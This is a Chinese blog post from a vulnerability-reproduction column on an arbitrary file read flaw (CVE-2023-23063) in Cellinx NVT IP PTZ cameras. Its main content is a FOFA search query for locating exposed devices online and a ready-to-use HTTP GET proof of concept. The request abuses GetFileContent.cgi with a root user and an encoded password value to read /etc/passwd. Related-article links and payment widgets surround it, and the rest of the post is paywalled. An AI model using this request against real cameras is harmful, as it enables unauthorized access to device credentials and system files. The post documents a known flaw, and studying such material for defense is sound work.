Cellinx NVT 摄像机 GetFileContent.cgi任意文件读取漏洞 (CVE-2023-23063)

已于 2023-12-16 03:48:42 修改
阅读量865 收藏 6
点赞数 10
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-16 01:11:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135027501
版权
本文介绍了Cellinx NVT IP PTZ摄像机在v1.0.6.002b版本中存在的安全漏洞,该漏洞允许攻击者读取系统敏感信息,如密码。复现环境为FOFA中发现body包含'local/NVT-string.js'。修复建议包括限制参数输入、设置访问白名单和避免公网访问。
摘要由CSDN通过智能技术生成

0x01 产品简介

Cellinx NVT IP PTZ是韩国Cellinx公司的一个摄像机设备。

0x02 漏洞概述

Cellinx NVT v1.0.6.002b版本存在安全漏洞,该漏洞源于存在本地文件泄露漏洞,攻击者可读取系统密码等敏感信息。

0x03 复现环境

FOFA:body="local/NVT-string.js"

3c6d489ca4894ea3aab042fb942bb1b5.png

0x04 漏洞复现

PoC

GET /cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd&_=1672577046605 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
Cellinx NVT 摄像机 UAC.cgi 任意用户创建漏洞复现
0xSec
01-16 702
Cellinx NVT 摄像机 UAC.cgi接口处存在任意用户创建漏洞,未经身份认证的攻击者可利用此接口创建管理员账户,登录后台可查看敏感信息,使系统处于极不安全的状态。
Cellinx NVT 摄像机 GetFileContent.cgi任意文件读取(含批量验证poc)
weixin_43567873的博客
04-17 76
Cellinx NVT 摄像机 GetFileContent.cgi任意文件读取(含批量验证poc)
韩国某摄像头公司存在未授权添加用户漏洞[漏洞复现]
Liyu_6618的博客
02-01 414
韩国某摄像头公司存在未授权添加用户漏洞[漏洞复现]
禁用Web服务器the TRACE and TRACK methods,修复80端口httpd漏洞CVE-2003-1567
lf_she的博客
08-07 2521
漏洞报告显示: Medium (CVSS: 5.8) NVT: HTTP Debugging Methods (TRACE/TRACK) Enabled References cve: CVE-2003-1567 cve: CVE-2004-2320 cve: CVE-2004-2763 cve: CVE-2005-3398 cve: CVE-2006-4683 cve: CVE-2007-3008 cve: CVE-2008-7253 cve: CVE-2009-2823 cve: CVE-2010-03
【复现】cellinx摄像设备 未授权漏洞_50
fushuang333的博客
02-16 558
【复现】cellinx摄像设备 未授权漏洞,通过未授权访问可以创建用户进入后台,可能造成系统功能破坏。
关闭ntp服务的 monitor monlist,解决漏洞CVE-2013-5211
lf_she的博客
08-05 3128
漏洞报告显示: Medium (CVSS: 5.0) NVT: NTP Monlist Feature Enabled References cve: CVE-2013-5211 Summary NTP.org’s ntpd is prone to a remote denial-of-service vulnerability because it fails to properly handle certain incoming network packets. Solutio
linux开源漏洞扫描引擎,ExpGuides/0x52_漏洞扫描-OpenVAS.md · wildlinux/NetSec - Gitee.com
weixin_39770626的博客
05-15 458
---title: "Markdown slide"theme: "beige"author: Wildlinuxdate: Mar 24, 2018output: revealjs::revealjs_presentation---p { text-align: left; }h2 { text-align: left; }---# 1. 漏洞扫描-OpenVAS--## 1.1. OpenVA...
community-nvt-feed-current.tar.bz2
08-03
2019年8月1日 community-nvt-feed-current.tar.bz2,由于openvas同步太慢,所以备份一份。
openvas-nvt-feed-current.tar.bz2
11-29
openvas离线更新包,主要是漏洞库及插件库!需要的可以下载
网络安全概述:从认知到实践
l1x1n0的博客
10-04 475
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 404
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1314
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
企业间图文档发放:如何在保障安全的同时提升效率?
文件数据安全交换
09-29 759
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。《Ftrans B2B企业间文件安全交换系统》仅需通用浏览器即可使用,用户界面清晰明了,功能操作和收发流程简单便捷,可快速在企业内外部推行,实现安全的图文档发放,极大降低用户学习成本,提升终端用户满意度,为企业内外部的业务协作提供保障。
安全服务面试
m0_74402888的博客
09-28 885
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 1005
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
【JWT安全】portswigger JWT labs 全解
uuzeray的博客
10-02 1297
根据设计,服务器通常不会存储有关其发出的 JWT 的任何信息。相反,每个令牌都是一个完全独立的实体。这有几个优点,但也带来了一个根本问题 - 服务器实际上不知道令牌的原始内容,甚至不知道原始签名是什么。因此,如果服务器没有正确验证签名,就无法阻止攻击者对令牌的其余部分进行任意更改。如果服务器根据此 来识别会话username,则修改其值可能会使攻击者能够冒充其他登录用户。同样,如果该isAdmin值用于访问控制,则可能为特权升级提供一个简单的payload。
Chromium 使用安全 DNS功能源码分析c++
jangdong的专栏
09-29 674
const DohProviderEntry::List& DohProviderEntry::GetList() 函数里面按照此格式追加即可。三、至此数据来源分析完毕,如果想要用自己的dns只需要在。二、那么如何自定义安全dns功能呢?2、看c++代码对应的注册函数。不同版本内核的浏览器有所差异。1、先看前端部分代码调用。
以太网交换安全:端口安全
fanshizhiren的博客
09-29 1028
端口安全作为一种重要的网络安全技术手段,在保护网络免受未经授权访问和潜在安全威胁方面发挥着关键作用。
TCP/IP文件传输协议FTP详解
- ASCII码文件:默认选项,文件以网络虚拟终端(NVT ASCII)码的形式传输。 - EBCDIC文件:适用于EBCDIC编码系统的文本文件。 - 图像(二进制)文件:以原始比特流的形式传输,适用于任何类型的数据。 4. **数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值